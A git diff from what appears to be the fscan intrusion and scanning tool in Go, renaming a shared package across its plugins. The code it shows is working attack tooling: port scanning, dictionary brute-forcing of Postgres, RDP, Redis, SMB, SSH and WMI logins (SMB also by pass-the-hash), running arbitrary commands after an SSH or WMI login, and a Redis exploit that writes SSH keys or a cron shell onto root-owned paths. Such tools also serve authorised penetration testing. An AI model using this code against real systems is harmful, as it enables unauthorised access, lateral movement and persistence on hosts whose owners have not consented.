if len(noPorts) > 0 {
temp := map[int]struct{}{}
for _, port := range probePorts {
@ -39,7 +39,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
probePorts = newDatas
sort.Ints(probePorts)
}
workers := common.Threads
workers := Common.Threads
Addrs := make(chan Addr, 100)
results := make(chan string, 100)
var wg sync.WaitGroup
@ -77,20 +77,20 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
host, port := addr.ip, addr.port
conn, err := common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
conn, err := Common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
if err == nil {
defer conn.Close()
address := host + ":" + strconv.Itoa(port)
result := fmt.Sprintf("%s open", address)
common.LogSuccess(result)
Common.LogSuccess(result)
wg.Add(1)
respondingHosts <- address
}
}
func NoPortScan(hostslist []string, ports string) (AliveAddress []string) {
probePorts := common.ParsePort(ports)
noPorts := common.ParsePort(common.NoPorts)
probePorts := Common.ParsePort(ports)
noPorts := Common.ParsePort(Common.NoPorts)
if len(noPorts) > 0 {
temp := map[int]struct{}{}
for _, port := range probePorts {

18
Plugins/postgres.go → Plugins/Postgres.go
View File

@ -4,31 +4,31 @@ import (
"database/sql"
"fmt"
_ "github.com/lib/pq"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings"
"time"
)
func PostgresScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute {
if Common.IsBrute {
return
}
starttime := time.Now().Unix()
for _, user := range common.Userdict["postgresql"] {
for _, pass := range common.Passwords {
for _, user := range Common.Userdict["postgresql"] {
for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
flag, err := PostgresConn(info, user, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] psql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
Common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) {
if time.Now().Unix()-starttime > (int64(len(Common.Userdict["postgresql"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@ -43,12 +43,12 @@ func PostgresConn(info *Config.HostInfo, user string, pass string) (flag bool, e
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
db, err := sql.Open("postgres", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
defer db.Close()
err = db.Ping()
if err == nil {
result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
Common.LogSuccess(result)
flag = true
}
}

20
Plugins/rdp.go → Plugins/RDP.go
View File

@ -3,8 +3,8 @@ package Plugins
import (
"errors"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"github.com/tomatome/grdp/core"
"github.com/tomatome/grdp/glog"
"github.com/tomatome/grdp/protocol/nla"
@ -28,25 +28,25 @@ type Brutelist struct {
}
func RdpScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute {
if Common.IsBrute {
return
}
var wg sync.WaitGroup
var signal bool
var num = 0
var all = len(common.Userdict["rdp"]) * len(common.Passwords)
var all = len(Common.Userdict["rdp"]) * len(Common.Passwords)
var mutex sync.Mutex
brlist := make(chan Brutelist)
port, _ := strconv.Atoi(info.Ports)
for i := 0; i < common.BruteThread; i++ {
for i := 0; i < Common.BruteThread; i++ {
wg.Add(1)
go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout)
go worker(info.Host, Common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, Common.Timeout)
}
for _, user := range common.Userdict["rdp"] {
for _, pass := range common.Passwords {
for _, user := range Common.Userdict["rdp"] {
for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
brlist <- Brutelist{user, pass}
}
@ -78,12 +78,12 @@ func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brute
} else {
result = fmt.Sprintf("[+] RDP %v:%v:%v %v", host, port, user, pass)
}
common.LogSuccess(result)
Common.LogSuccess(result)
*signal = true
return
} else {
errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err)
common.LogError(errlog)
Common.LogError(errlog)
}
}
}
@ -126,7 +126,7 @@ func NewClient(host string, logLevel glog.LEVEL) *Client {
}
func (g *Client) Login(domain, user, pwd string, timeout int64) error {
conn, err := common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
conn, err := Common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
if err != nil {
return fmt.Errorf("[dial err] %v", err)
}

46
Plugins/redis.go → Plugins/Redis.go
View File

@ -3,8 +3,8 @@ package Plugins
import (
"bufio"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"io"
"net"
"os"
@ -23,22 +23,22 @@ func RedisScan(info *Config.HostInfo) (tmperr error) {
if flag == true && err == nil {
return err
}
if common.IsBrute {
if Common.IsBrute {
return
}
for _, pass := range common.Passwords {
for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", "redis", -1)
flag, err := RedisConn(info, pass)
if flag == true && err == nil {
return err
} else {
errlog := fmt.Sprintf("[-] redis %v:%v %v %v", info.Host, info.Ports, pass, err)
common.LogError(errlog)
Common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) {
if time.Now().Unix()-starttime > (int64(len(Common.Passwords)) * Common.Timeout) {
return err
}
}
@ -49,12 +49,12 @@ func RedisScan(info *Config.HostInfo) (tmperr error) {
func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return flag, err
}
defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return flag, err
}
@ -71,11 +71,11 @@ func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) {
dbfilename, dir, err = getconfig(conn)
if err != nil {
result := fmt.Sprintf("[+] Redis %s %s", realhost, pass)
common.LogSuccess(result)
Common.LogSuccess(result)
return flag, err
} else {
result := fmt.Sprintf("[+] Redis %s %s file:%s/%s", realhost, pass, dir, dbfilename)
common.LogSuccess(result)
Common.LogSuccess(result)
}
err = Expoilt(realhost, conn)
}
@ -85,12 +85,12 @@ func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) {
func RedisUnauth(info *Config.HostInfo) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil {
return flag, err
}
defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil {
return flag, err
}
@ -107,11 +107,11 @@ func RedisUnauth(info *Config.HostInfo) (flag bool, err error) {
dbfilename, dir, err = getconfig(conn)
if err != nil {
result := fmt.Sprintf("[+] Redis %s unauthorized", realhost)
common.LogSuccess(result)
Common.LogSuccess(result)
return flag, err
} else {
result := fmt.Sprintf("[+] Redis %s unauthorized file:%s/%s", realhost, dir, dbfilename)
common.LogSuccess(result)
Common.LogSuccess(result)
}
err = Expoilt(realhost, conn)
}
@ -119,7 +119,7 @@ func RedisUnauth(info *Config.HostInfo) (flag bool, err error) {
}
func Expoilt(realhost string, conn net.Conn) error {
if common.Noredistest {
if Common.Noredistest {
return nil
}
flagSsh, flagCron, err := testwrite(conn)
@ -128,16 +128,16 @@ func Expoilt(realhost string, conn net.Conn) error {
}
if flagSsh == true {
result := fmt.Sprintf("[+] Redis %v like can write /root/.ssh/", realhost)
common.LogSuccess(result)
if common.RedisFile != "" {
writeok, text, err := writekey(conn, common.RedisFile)
Common.LogSuccess(result)
if Common.RedisFile != "" {
writeok, text, err := writekey(conn, Common.RedisFile)
if err != nil {
fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text))
return err
}
if writeok {
result := fmt.Sprintf("[+] Redis %v SSH public key was written successfully", realhost)
common.LogSuccess(result)
Common.LogSuccess(result)
} else {
fmt.Println("[-] Redis ", realhost, "SSHPUB write failed", text)
}
@ -146,15 +146,15 @@ func Expoilt(realhost string, conn net.Conn) error {
if flagCron == true {
result := fmt.Sprintf("[+] Redis %v like can write /var/spool/cron/", realhost)
common.LogSuccess(result)
if common.RedisShell != "" {
writeok, text, err := writecron(conn, common.RedisShell)
Common.LogSuccess(result)
if Common.RedisShell != "" {
writeok, text, err := writecron(conn, Common.RedisShell)
if err != nil {
return err
}
if writeok {
result := fmt.Sprintf("[+] Redis %v /var/spool/cron/root was written successfully", realhost)
common.LogSuccess(result)
Common.LogSuccess(result)
} else {
fmt.Println("[-] Redis ", realhost, "cron write failed", text)
}

24
Plugins/smb.go → Plugins/SMB.go
View File

@ -3,8 +3,8 @@ package Plugins
import (
"errors"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"github.com/stacktitan/smb/smb"
"strings"
"time"
@ -13,15 +13,15 @@ import (
// SmbScan 执行SMB服务的认证扫描
func SmbScan(info *Config.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回
if common.IsBrute {
if Common.IsBrute {
return nil
}
startTime := time.Now().Unix()
// 遍历用户名和密码字典进行认证尝试
for _, user := range common.Userdict["smb"] {
for _, pass := range common.Passwords {
for _, user := range Common.Userdict["smb"] {
for _, pass := range Common.Passwords {
// 替换密码中的用户名占位符
pass = strings.Replace(pass, "{user}", user, -1)
@ -31,30 +31,30 @@ func SmbScan(info *Config.HostInfo) (tmperr error) {
if success && err == nil {
// 认证成功,记录结果
var result string
if common.Domain != "" {
if Common.Domain != "" {
result = fmt.Sprintf("[✓] SMB认证成功 %v:%v Domain:%v\\%v Pass:%v",
info.Host, info.Ports, common.Domain, user, pass)
info.Host, info.Ports, Common.Domain, user, pass)
} else {
result = fmt.Sprintf("[✓] SMB认证成功 %v:%v User:%v Pass:%v",
info.Host, info.Ports, user, pass)
}
common.LogSuccess(result)
Common.LogSuccess(result)
return err
} else {
// 认证失败,记录错误
errorMsg := fmt.Sprintf("[x] SMB认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass,
strings.ReplaceAll(err.Error(), "\n", ""))
common.LogError(errorMsg)
Common.LogError(errorMsg)
tmperr = err
// 检查是否需要中断扫描
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
// 检查是否超时
timeoutLimit := int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout
timeoutLimit := int64(len(Common.Userdict["smb"])*len(Common.Passwords)) * Common.Timeout
if time.Now().Unix()-startTime > timeoutLimit {
return err
}
@ -74,7 +74,7 @@ func SmblConn(info *Config.HostInfo, user string, pass string, signal chan struc
Port: 445,
User: user,
Password: pass,
Domain: common.Domain,
Domain: Common.Domain,
Workstation: "",
}
@ -105,7 +105,7 @@ func doWithTimeOut(info *Config.HostInfo, user string, pass string) (flag bool,
select {
case <-signal:
return flag, err
case <-time.After(time.Duration(common.Timeout) * time.Second):
case <-time.After(time.Duration(Common.Timeout) * time.Second):
return false, errors.New("[!] SMB连接超时")
}
}

50
Plugins/smb2.go → Plugins/SMB2.go
View File

@ -2,8 +2,8 @@ package Plugins
import (
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"net"
"os"
"strings"
@ -15,7 +15,7 @@ import (
// SmbScan2 执行SMB2服务的认证扫描支持密码和哈希两种认证方式
func SmbScan2(info *Config.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回
if common.IsBrute {
if Common.IsBrute {
return nil
}
@ -23,7 +23,7 @@ func SmbScan2(info *Config.HostInfo) (tmperr error) {
startTime := time.Now().Unix()
// 使用哈希认证模式
if len(common.HashBytes) > 0 {
if len(Common.HashBytes) > 0 {
return smbHashScan(info, hasprint, startTime)
}
@ -33,8 +33,8 @@ func SmbScan2(info *Config.HostInfo) (tmperr error) {
// smbHashScan 使用哈希进行认证扫描
func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
for _, user := range common.Userdict["smb"] {
for _, hash := range common.HashBytes {
for _, user := range Common.Userdict["smb"] {
for _, hash := range Common.HashBytes {
success, err, printed := Smb2Con(info, user, "", hash, hasprint)
if printed {
hasprint = true
@ -47,11 +47,11 @@ func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
logFailedAuth(info, user, "", hash, err)
if shouldStopScan(err, startTime, len(common.Userdict["smb"])*len(common.HashBytes)) {
if shouldStopScan(err, startTime, len(Common.Userdict["smb"])*len(Common.HashBytes)) {
return err
}
if len(common.Hash) > 0 {
if len(Common.Hash) > 0 {
break
}
}
@ -61,8 +61,8 @@ func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
// smbPasswordScan 使用密码进行认证扫描
func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) error {
for _, user := range common.Userdict["smb"] {
for _, pass := range common.Passwords {
for _, user := range Common.Userdict["smb"] {
for _, pass := range Common.Passwords {
pass = strings.ReplaceAll(pass, "{user}", user)
success, err, printed := Smb2Con(info, user, pass, []byte{}, hasprint)
if printed {
@ -76,11 +76,11 @@ func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) erro
logFailedAuth(info, user, pass, []byte{}, err)
if shouldStopScan(err, startTime, len(common.Userdict["smb"])*len(common.Passwords)) {
if shouldStopScan(err, startTime, len(Common.Userdict["smb"])*len(Common.Passwords)) {
return err
}
if len(common.Hash) > 0 {
if len(Common.Hash) > 0 {
break
}
}
@ -91,20 +91,20 @@ func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) erro
// logSuccessfulAuth 记录成功的认证
func logSuccessfulAuth(info *Config.HostInfo, user, pass string, hash []byte) {
var result string
if common.Domain != "" {
if Common.Domain != "" {
result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v Domain:%v\\%v ",
info.Host, info.Ports, common.Domain, user)
info.Host, info.Ports, Common.Domain, user)
} else {
result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v User:%v ",
info.Host, info.Ports, user)
}
if len(hash) > 0 {
result += fmt.Sprintf("Hash:%v", common.Hash)
result += fmt.Sprintf("Hash:%v", Common.Hash)
} else {
result += fmt.Sprintf("Pass:%v", pass)
}
common.LogSuccess(result)
Common.LogSuccess(result)
}
// logFailedAuth 记录失败的认证
@ -112,22 +112,22 @@ func logFailedAuth(info *Config.HostInfo, user, pass string, hash []byte, err er
var errlog string
if len(hash) > 0 {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Hash:%v Err:%v",
info.Host, info.Ports, user, common.Hash, err)
info.Host, info.Ports, user, Common.Hash, err)
} else {
errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass, err)
}
errlog = strings.ReplaceAll(errlog, "\n", " ")
common.LogError(errlog)
Common.LogError(errlog)
}
// shouldStopScan 检查是否应该停止扫描
func shouldStopScan(err error, startTime int64, totalAttempts int) bool {
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return true
}
if time.Now().Unix()-startTime > (int64(totalAttempts) * common.Timeout) {
if time.Now().Unix()-startTime > (int64(totalAttempts) * Common.Timeout) {
return true
}
@ -138,7 +138,7 @@ func shouldStopScan(err error, startTime int64, totalAttempts int) bool {
func Smb2Con(info *Config.HostInfo, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) {
// 建立TCP连接
conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:445", info.Host),
time.Duration(common.Timeout)*time.Second)
time.Duration(Common.Timeout)*time.Second)
if err != nil {
return false, fmt.Errorf("连接失败: %v", err), false
}
@ -147,7 +147,7 @@ func Smb2Con(info *Config.HostInfo, user string, pass string, hash []byte, haspr
// 配置NTLM认证
initiator := smb2.NTLMInitiator{
User: user,
Domain: common.Domain,
Domain: Common.Domain,
}
// 设置认证方式(哈希或密码)
@ -202,9 +202,9 @@ func logShareInfo(info *Config.HostInfo, user string, pass string, hash []byte,
var result string
// 构建基础信息
if common.Domain != "" {
if Common.Domain != "" {
result = fmt.Sprintf("[*] SMB2共享信息 %v:%v Domain:%v\\%v ",
info.Host, info.Ports, common.Domain, user)
info.Host, info.Ports, Common.Domain, user)
} else {
result = fmt.Sprintf("[*] SMB2共享信息 %v:%v User:%v ",
info.Host, info.Ports, user)
@ -212,12 +212,12 @@ func logShareInfo(info *Config.HostInfo, user string, pass string, hash []byte,
// 添加认证信息
if len(hash) > 0 {
result += fmt.Sprintf("Hash:%v ", common.Hash)
result += fmt.Sprintf("Hash:%v ", Common.Hash)
} else {
result += fmt.Sprintf("Pass:%v ", pass)
}
// 添加共享列表
result += fmt.Sprintf("可用共享: %v", shares)
common.LogSuccess(result)
Common.LogSuccess(result)
}

38
Plugins/ssh.go → Plugins/SSH.go
View File

@ -2,8 +2,8 @@ package Plugins
import (
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"golang.org/x/crypto/ssh"
"io/ioutil"
"net"
@ -13,15 +13,15 @@ import (
// SshScan 执行SSH服务的认证扫描
func SshScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute {
if Common.IsBrute {
return
}
startTime := time.Now().Unix()
// 遍历用户名和密码字典进行认证尝试
for _, user := range common.Userdict["ssh"] {
for _, pass := range common.Passwords {
for _, user := range Common.Userdict["ssh"] {
for _, pass := range Common.Passwords {
// 替换密码中的用户名占位符
pass = strings.Replace(pass, "{user}", user, -1)
@ -33,22 +33,22 @@ func SshScan(info *Config.HostInfo) (tmperr error) {
// 记录失败信息
errlog := fmt.Sprintf("[x] SSH认证失败 %v:%v User:%v Pass:%v Err:%v",
info.Host, info.Ports, user, pass, err)
common.LogError(errlog)
Common.LogError(errlog)
tmperr = err
// 检查是否需要中断扫描
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
// 检查是否超时
timeoutLimit := int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout
timeoutLimit := int64(len(Common.Userdict["ssh"])*len(Common.Passwords)) * Common.Timeout
if time.Now().Unix()-startTime > timeoutLimit {
return err
}
// 如果指定了SSH密钥则不进行密码尝试
if common.SshKey != "" {
if Common.SshKey != "" {
return err
}
}
@ -60,9 +60,9 @@ func SshScan(info *Config.HostInfo) (tmperr error) {
func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
// 准备认证方法
var auth []ssh.AuthMethod
if common.SshKey != "" {
if Common.SshKey != "" {
// 使用SSH密钥认证
pemBytes, err := ioutil.ReadFile(common.SshKey)
pemBytes, err := ioutil.ReadFile(Common.SshKey)
if err != nil {
return false, fmt.Errorf("读取密钥失败: %v", err)
}
@ -81,7 +81,7 @@ func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err er
config := &ssh.ClientConfig{
User: user,
Auth: auth,
Timeout: time.Duration(common.Timeout) * time.Second,
Timeout: time.Duration(Common.Timeout) * time.Second,
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
return nil
},
@ -97,23 +97,23 @@ func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err er
flag = true
// 处理认证成功的情况
if common.Command != "" {
if Common.Command != "" {
// 执行指定命令
output, _ := session.CombinedOutput(common.Command)
if common.SshKey != "" {
common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v\n命令输出:\n%v",
output, _ := session.CombinedOutput(Common.Command)
if Common.SshKey != "" {
Common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v\n命令输出:\n%v",
info.Host, info.Ports, string(output)))
} else {
common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v\n命令输出:\n%v",
Common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v\n命令输出:\n%v",
info.Host, info.Ports, user, pass, string(output)))
}
} else {
// 仅记录认证成功
if common.SshKey != "" {
common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v",
if Common.SshKey != "" {
Common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v",
info.Host, info.Ports))
} else {
common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v",
Common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v",
info.Host, info.Ports, user, pass))
}
}

62
Plugins/scanner.go → Plugins/Scanner.go
View File

@ -2,9 +2,9 @@ package Plugins
import (
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"strconv"
"strings"
"sync"
@ -14,19 +14,19 @@ func Scan(info Config.HostInfo) {
fmt.Println("[*] 开始信息扫描...")
// 本地信息收集模块
if common.Scantype == "localinfo" {
ch := make(chan struct{}, common.Threads)
if Common.Scantype == "localinfo" {
ch := make(chan struct{}, Common.Threads)
wg := sync.WaitGroup{}
AddScan("localinfo", info, &ch, &wg)
wg.Wait()
common.LogWG.Wait()
close(common.Results)
fmt.Printf("[✓] 扫描完成 %v/%v\n", common.End, common.Num)
Common.LogWG.Wait()
close(Common.Results)
fmt.Printf("[✓] 扫描完成 %v/%v\n", Common.End, Common.Num)
return
}
// 解析目标主机IP
Hosts, err := common.ParseIP(info.Host, common.HostFile, common.NoHosts)
Hosts, err := Common.ParseIP(info.Host, Common.HostFile, Common.NoHosts)
if err != nil {
fmt.Printf("[!] 解析主机错误: %v\n", err)
return
@ -34,29 +34,29 @@ func Scan(info Config.HostInfo) {
// 初始化配置
lib.Inithttp()
ch := make(chan struct{}, common.Threads)
ch := make(chan struct{}, Common.Threads)
wg := sync.WaitGroup{}
var AlivePorts []string
if len(Hosts) > 0 || len(common.HostPort) > 0 {
if len(Hosts) > 0 || len(Common.HostPort) > 0 {
// ICMP存活性检测
if (common.NoPing == false && len(Hosts) > 1) || common.Scantype == "icmp" {
Hosts = CheckLive(Hosts, common.Ping)
if (Common.NoPing == false && len(Hosts) > 1) || Common.Scantype == "icmp" {
Hosts = CheckLive(Hosts, Common.Ping)
fmt.Printf("[+] ICMP存活主机数量: %d\n", len(Hosts))
if common.Scantype == "icmp" {
common.LogWG.Wait()
if Common.Scantype == "icmp" {
Common.LogWG.Wait()
return
}
}
// 端口扫描策略
AlivePorts = executeScanStrategy(Hosts, common.Scantype)
AlivePorts = executeScanStrategy(Hosts, Common.Scantype)
// 处理自定义端口
if len(common.HostPort) > 0 {
AlivePorts = append(AlivePorts, common.HostPort...)
AlivePorts = common.RemoveDuplicate(AlivePorts)
common.HostPort = nil
if len(Common.HostPort) > 0 {
AlivePorts = append(AlivePorts, Common.HostPort...)
AlivePorts = Common.RemoveDuplicate(AlivePorts)
Common.HostPort = nil
fmt.Printf("[+] 总计存活端口: %d\n", len(AlivePorts))
}
@ -70,37 +70,37 @@ func Scan(info Config.HostInfo) {
}
info.Host, info.Ports = hostParts[0], hostParts[1]
executeScanTasks(info, common.Scantype, &ch, &wg)
executeScanTasks(info, Common.Scantype, &ch, &wg)
}
}
// URL扫描
for _, url := range common.Urls {
for _, url := range Common.Urls {
info.Url = url
AddScan("web", info, &ch, &wg)
}
// 等待所有任务完成
wg.Wait()
common.LogWG.Wait()
close(common.Results)
fmt.Printf("[✓] 扫描已完成: %v/%v\n", common.End, common.Num)
Common.LogWG.Wait()
close(Common.Results)
fmt.Printf("[✓] 扫描已完成: %v/%v\n", Common.End, Common.Num)
}
// executeScanStrategy 执行端口扫描策略
func executeScanStrategy(Hosts []string, scanType string) []string {
switch scanType {
case "webonly", "webpoc":
return NoPortScan(Hosts, common.Ports)
return NoPortScan(Hosts, Common.Ports)
case "hostname":
common.Ports = "139"
return NoPortScan(Hosts, common.Ports)
Common.Ports = "139"
return NoPortScan(Hosts, Common.Ports)
default:
if len(Hosts) > 0 {
ports := PortScan(Hosts, common.Ports, common.Timeout)
ports := PortScan(Hosts, Common.Ports, Common.Timeout)
fmt.Printf("[+] 存活端口数量: %d\n", len(ports))
if scanType == "portscan" {
common.LogWG.Wait()
Common.LogWG.Wait()
return nil
}
return ports
@ -116,7 +116,7 @@ func executeScanTasks(info Config.HostInfo, scanType string, ch *chan struct{},
switch info.Ports {
case "135":
AddScan("findnet", info, ch, wg)
if common.IsWmi {
if Common.IsWmi {
AddScan("wmiexec", info, ch, wg)
}
case "445":
@ -160,7 +160,7 @@ func AddScan(scantype string, info Config.HostInfo, ch *chan struct{}, wg *sync.
// 增加总任务数
Mutex.Lock()
common.Num += 1
Common.Num += 1
Mutex.Unlock()
// 执行扫描
@ -168,7 +168,7 @@ func AddScan(scantype string, info Config.HostInfo, ch *chan struct{}, wg *sync.
// 增加已完成任务数
Mutex.Lock()
common.End += 1
Common.End += 1
Mutex.Unlock()
}()
}

32
Plugins/wmiexec.go → Plugins/WMIExec.go
View File

@ -3,8 +3,8 @@ package Plugins
import (
"errors"
"fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"os"
"strings"
"time"
@ -28,42 +28,42 @@ func init() {
}
func WmiExec(info *Config.HostInfo) (tmperr error) {
if common.IsBrute {
if Common.IsBrute {
return nil
}
starttime := time.Now().Unix()
for _, user := range common.Userdict["smb"] {
for _, user := range Common.Userdict["smb"] {
PASS:
for _, pass := range common.Passwords {
for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
flag, err := Wmiexec(info, user, pass, common.Hash)
flag, err := Wmiexec(info, user, pass, Common.Hash)
errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err)
errlog = strings.Replace(errlog, "\n", "", -1)
common.LogError(errlog)
Common.LogError(errlog)
if flag == true {
var result string
if common.Domain != "" {
result = fmt.Sprintf("[+] WmiExec %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
if Common.Domain != "" {
result = fmt.Sprintf("[+] WmiExec %v:%v:%v\\%v ", info.Host, info.Ports, Common.Domain, user)
} else {
result = fmt.Sprintf("[+] WmiExec %v:%v:%v ", info.Host, info.Ports, user)
}
if common.Hash != "" {
result += "hash: " + common.Hash
if Common.Hash != "" {
result += "hash: " + Common.Hash
} else {
result += pass
}
common.LogSuccess(result)
Common.LogSuccess(result)
return err
} else {
tmperr = err
if common.CheckErrs(err) {
if Common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
if time.Now().Unix()-starttime > (int64(len(Common.Userdict["smb"])*len(Common.Passwords)) * Common.Timeout) {
return err
}
}
if len(common.Hash) == 32 {
if len(Common.Hash) == 32 {
break PASS
}
}
@ -73,8 +73,8 @@ func WmiExec(info *Config.HostInfo) (tmperr error) {
func Wmiexec(info *Config.HostInfo, user string, pass string, hash string) (flag bool, err error) {
target := fmt.Sprintf("%s:%v", info.Host, info.Ports)
wmiexec.Timeout = int(common.Timeout)
return WMIExec(target, user, pass, hash, common.Domain, common.Command, ClientHost, "", nil)
wmiexec.Timeout = int(Common.Timeout)
return WMIExec(target, user, pass, hash, Common.Domain, Common.Command, ClientHost, "", nil)
}
func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) {

30
Plugins/webtitle.go → Plugins/WebTitle.go
View File

@ -13,14 +13,14 @@ import (
"time"
"unicode/utf8"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/WebScan"
"github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"golang.org/x/text/encoding/simplifiedchinese"
)
func WebTitle(info *Config.HostInfo) error {
if common.Scantype == "webpoc" {
if Common.Scantype == "webpoc" {
WebScan.WebScan(info)
return nil
}
@ -32,11 +32,11 @@ func WebTitle(info *Config.HostInfo) error {
return nil
}
}
if !common.NoPoc && err == nil {
if !Common.NoPoc && err == nil {
WebScan.WebScan(info)
} else {
errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
common.LogError(errlog)
Common.LogError(errlog)
}
return err
}
@ -49,13 +49,13 @@ func GOWebTitle(info *Config.HostInfo) (err error, CheckData []WebScan.CheckData
